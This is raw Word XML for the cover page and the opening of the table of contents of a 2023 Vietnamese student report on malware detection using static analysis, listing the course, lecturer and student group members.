        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Môn: </w:t>
      </w:r>
      <w:r w:rsidR="00826669">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHÂN TÍCH MÃ ĐỘC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383AE3DC" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46444A1C" w14:textId="47991B99" w:rsidR="007C3349" w:rsidRPr="008826E1" w:rsidRDefault="008826E1" w:rsidP="007C3349">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phát hiện mã độc dựa trên phân tích tĩnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DBF02F" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449A1703" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6671A30E" w14:textId="2F7DD864" w:rsidR="007C3349" w:rsidRPr="007C3349" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:ind w:left="1418"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Giảng viên   :</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đỗ Xuân Chợ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30894F8A" w14:textId="6DD934B5" w:rsidR="007C3349" w:rsidRPr="007C3349" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:ind w:left="1418"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Nhóm lớp     :        0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBD39DA" w14:textId="6D63EAF9" w:rsidR="007C3349" w:rsidRPr="007C3349" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:ind w:left="1418"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Nhóm BTL  :         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C611611" w14:textId="300EB3E9" w:rsidR="007C3349" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:ind w:left="1418"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Tên sinh viên:        N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inh Chí Hướng</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> B20DCAT</w:t>
      </w:r>
      <w:r w:rsidR="00EE234B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>094</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CD1F83" w14:textId="07835244" w:rsidR="00EE234B" w:rsidRPr="00EE234B" w:rsidRDefault="00EE234B" w:rsidP="007C3349">
      <w:pPr>
        <w:ind w:left="1418"/>
        <w:jc w:val="both"/>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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    Vũ Ngọc Phương </w:t>
      </w:r>
      <w:r w:rsidR="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> B20DCAT1</w:t>
      </w:r>
      <w:r w:rsidR="006C7EC4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13987B05" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:ind w:left="1418"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   Hoàng Trung Kiên - B20DCAT098</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB4376C" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:ind w:left="1418"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   Nguyễn Trần Minh - B20DCAT126</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF0473" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:ind w:left="1418"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1A7DED" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7470"/>
        </w:tabs>
        <w:ind w:right="1559"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455DD83F" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7470"/>
        </w:tabs>
        <w:ind w:right="1559"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3DB8FC" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7470"/>
        </w:tabs>
        <w:ind w:right="1559"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26EE7C0E" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7470"/>
        </w:tabs>
        <w:ind w:right="1559"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2619FD21" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                       HÀ NỘI, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E109EDF" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EABC094" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153FCFED" w14:textId="77777777" w:rsidR="007C3349" w:rsidRDefault="007C3349">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CE6EC9" w14:textId="77777777" w:rsidR="007C3349" w:rsidRDefault="007C3349">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C50F5F2" w14:textId="2BD1575D" w:rsidR="009A17C6" w:rsidRDefault="009A17C6" w:rsidP="00947F5D">
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3FF774" w14:textId="77777777" w:rsidR="00947F5D" w:rsidRDefault="00947F5D" w:rsidP="00947F5D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:id w:val="-971289190"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="463847B2" w14:textId="1B7F38C7" w:rsidR="00947F5D" w:rsidRPr="00947F5D" w:rsidRDefault="00947F5D">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="auto"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00947F5D">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="auto"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>Mục lục</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="54EB6FB2" w14:textId="557671B8" w:rsidR="00947F5D" w:rsidRDefault="00947F5D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="vi-VN"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc150718114" w:history="1">
            <w:r w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>I.Các khái niệm cơ bản</w:t>
            </w:r>
            <w:r w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718114 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6728F5AD" w14:textId="5656B792"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15" w:history="1">
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tổng quan về phân tích tĩnh</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D" w:rsidRPr="000F5776">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc150718115 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00947F5D">
              <w:rPr>
                <w:noProof/>
